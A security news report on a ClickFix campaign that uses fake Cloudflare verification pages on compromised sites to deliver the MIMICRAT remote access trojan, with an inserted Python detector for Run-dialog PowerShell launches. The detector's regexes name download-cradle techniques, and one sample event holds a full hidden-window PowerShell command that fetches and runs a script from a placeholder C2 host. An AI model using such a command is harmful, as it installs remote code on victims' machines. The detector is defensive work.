ClickFix Campaign Leverages Compromised Sites to Distribute MIMICRAT RAT Malware


Cybersecurity Researchers Uncover Sophisticated Campaign

Cybersecurity researchers have uncovered a sophisticated campaign, dubbed ClickFix, which leverages compromised websites across various industries and geographies to deliver a novel remote access trojan (RAT) known as MIMICRAT.

Key Features of the Campaign

This custom C++ RAT boasts an array of features, including Windows token impersonation, SOCKS5 tunneling, and a range of 22 commands for comprehensive post-exploitation capabilities.

Operational Sophistication

The campaign’s operational sophistication is notable: compromised sites serve as delivery infrastructure, a multi-stage PowerShell chain bypasses Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI), and the final implant communicates over HTTPS on port 443, masquerading as legitimate web analytics traffic.

According to researchers, the entry point for the infection sequence is a breached Bank Identification Number (BIN) validation service, bincheck[.]io, which has been injected with malicious JavaScript code.

This code loads an externally hosted PHP script, which in turn delivers the ClickFix lure, a fake Cloudflare verification page. The page instructs the victim to copy and paste a command into the Windows Run dialog, leading to the execution of a PowerShell command that contacts a command-and-control (C2) server to fetch a second-stage PowerShell script.
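Defender-side detection for the launch step described above, as an added example that is not from the report or the researchers: it scores process-creation events (Sysmon Event ID 1 field names assumed) for a PowerShell launch spawned from explorer.exe, which is how a command pasted into the Run dialog starts, combined with download-cradle switches. The indicator weights, the threshold of 5, and the sample events with their placeholder URL are constructed assumptions, not values from the campaign.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:  # field names follow Sysmon Event ID 1 (assumed log source)
    parent_image: str
    image: str
    command_line: str

# Weighted indicators: each is common in admin scripts alone; several together, from explorer.exe, is the ClickFix launch pattern.
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    (re.compile(r"downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I), 2),
    (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
    (re.compile(r"https?://", re.I), 1),
]
LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev: ProcEvent):
    """Return (score, reasons) for one event; (0, []) for non-launcher images."""
    if _basename(ev.image) not in LAUNCHERS:
        return 0, []
    score, reasons = 0, []
    # Win+R launches children of explorer.exe; the pasted text is also kept in HKCU\...\Explorer\RunMRU for forensic confirmation.
    if _basename(ev.parent_image) == "explorer.exe":
        score, reasons = 2, ["parent is explorer.exe (Run dialog / shell)"]
    for rx, weight in INDICATORS:
        if rx.search(ev.command_line):
            score += weight
            reasons.append(rx.pattern)
    return score, reasons

def find_clickfix_candidates(events, threshold=5):
    """Return (event, score, reasons) for events scoring at or above threshold."""
    scored = [(ev, *score_event(ev)) for ev in events]
    return [t for t in scored if t[1] >= threshold]

# Constructed sample events, not taken from the report; the URL is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell -w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/s')\""),
    ProcEvent(r"C:\Windows\System32\svchost.exe", PS, r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]
```

The scheduled-task style launch in the second sample scores 2 and stays below the threshold, while the Run-dialog cradle scores 10 and is flagged.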

Command and Control Server

The C2 server communicates with the RAT over HTTPS and accepts two dozen commands covering process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.

Language Support and Reach

Notably, the campaign supports 17 languages, with lure content dynamically localized based on the victim’s browser language settings, broadening its effective reach.

Victims and Suspected Goals

Researchers have identified victims spanning multiple geographies, including a US-based university and multiple Chinese-speaking users. The ultimate goal of the attack is suspected to be ransomware deployment or data exfiltration.

Overlap with Other Campaigns

The campaign’s tactics and infrastructure also show overlaps with another ClickFix campaign, which leads to the deployment of the Matanbuchus 3.0 loader, serving as a conduit for the same RAT.

Conclusion

The discovery of this campaign highlights the importance of vigilance in the face of increasingly sophisticated threats. As the threat landscape continues to evolve, it is essential for organizations to remain proactive in their cybersecurity efforts, staying informed about the latest tactics, techniques, and procedures (TTPs) employed by threat actors.
